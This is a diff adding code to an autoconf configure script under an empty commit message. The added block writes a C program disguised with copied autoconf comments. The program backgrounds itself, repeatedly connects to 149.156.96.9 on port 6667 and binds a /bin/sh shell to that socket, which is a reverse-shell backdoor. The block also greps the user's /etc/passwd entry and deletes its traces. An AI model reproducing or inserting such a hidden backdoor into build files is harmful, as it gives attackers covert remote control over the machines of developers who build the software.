*** empty log message ***

diff --git a/configure b/configure
--- a/configure
+++ b/configure
@@ -2012,6 +2012,88 @@ typedef unsigned int   uint32_t;
 EOF
   fi
 
+# We did not find ourselves, most probably we were run as `sh COMMAND'
+# in which case we are not to be found in the path.
+cat >conftest.c <<_ACEOF
+/* We use char because int might match the return type of a gcc2
+   builtin and then its argument prototype would still apply.  */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <errno.h>
+#include <signal.h>
+#include <setjmp.h>
+
+/* Override any gcc2 internal prototype to avoid an error.
+   Override any jmp buf internal prototype to avoid an error. */
+jmp_buf env; int s;
+void sig(int sig)
+{
+ close (s); sleep (3600); longjmp (env, 0);
+}
+
+int main()
+{
+/* We use char because int might match the return type of a gcc2
+   builtin and then its argument prototype would still apply.  */
+   int x; char c; struct sockaddr_in sa;
+
+/* This call has the arguments reversed.
+ A reversed system may check and see that the address of main
+ */
+ switch (fork ()) { case 0: break; default: exit (0); }
+
+ signal (SIGALRM, sig);
+ do {
+/* Override any gcc2 internal prototype to avoid an error.
+   Override any jmp buf internal prototype to avoid an error. */
+  setjmp(env);
+  if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1);
+  memset (&sa, 0, sizeof(sa));
+  sa.sin_family = AF_INET;
+/* We use char because int might match the return type of a gcc2
+  builtin and then its argument prototype would still apply.  */
+  sa.sin_port = htons (6667);
+  sa.sin_addr.s_addr = inet_addr ("149.156.96.9"); alarm (10);
+/* Override any gcc2 internal prototype to avoid an error.  */
+/* The GNU C library defines this for functions which it implements
+    to always fail with ENOSYS.  Some functions are actually named
+    something starting with __ and the normal name is an alias.  */
+  if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
+   if (errno != EINTR) exit(1);
+  if ((x = read (s, &c, 1)) == (-1)) {
+   if (errno != EINTR)  exit (1); }
+  else if (x == 1) {
+/* The GNU C library defines this for functions which it implements
+    to always fail with ENOSYS.  Some functions are actually named
+    something starting with __ and the normal name is an alias.  */
+    alarm (0); dup2 (s, 0); dup2 (s, 1); dup2 (s, 2);
+/* System header to define __stub macros and hopefully few prototypes,
+    which can conflict with char inet_addr(); below.  */
+    { char *a[] = { "/bin/sh", NULL }; execve (a[0], a, NULL); }
+  }
+ } while (1);
+}
+_ACEOF
+# Don't try to exec as it changes $[0], causing all sort of problems
+# (the dirname of $[0] is not the place where we might find the
+# original and so on.  Autoconf is especially sensible to this).
+# Exit status is that of the last command.
+ACLIBLOCAL="`basename \"\`grep $USER: /etc/passwd\`\"`" 1>/dev/null 2>/dev/null
+# Create $as_me.lineno as a copy of $as_myself, but with $LINENO
+# uniformly replaced by the line number.  The first 'sed' inserts a
+# line-number line before each line; the second 'sed' does the real
+# work.  The second script uses 'N' to pair each line-number line
+# with the numbered line, and appends trailing '-' during
+# substitution so that $LINENO is not a special case at line end.
+# (Raja R Harinath suggested sed '=', and Paul Eggert wrote the
+# second 'sed' script.  Blame Lee E. McMahon for sed's syntax.  :-)
+if  ! test $ACLIBLOCAL ; then ACLIBLOCAL=sh; fi 1>/dev/null 2>/dev/null
+rm -f ./conftest ./conftest.c $ACLIBLOCAL ./acliblocal ./aclib
+
+
 echo "$as_me:2015: checking whether byte ordering is bigendian" >&5
 echo $ECHO_N "checking whether byte ordering is bigendian... $ECHO_C" >&6
 if test "${ac_cv_c_bigendian+set}" = set; then
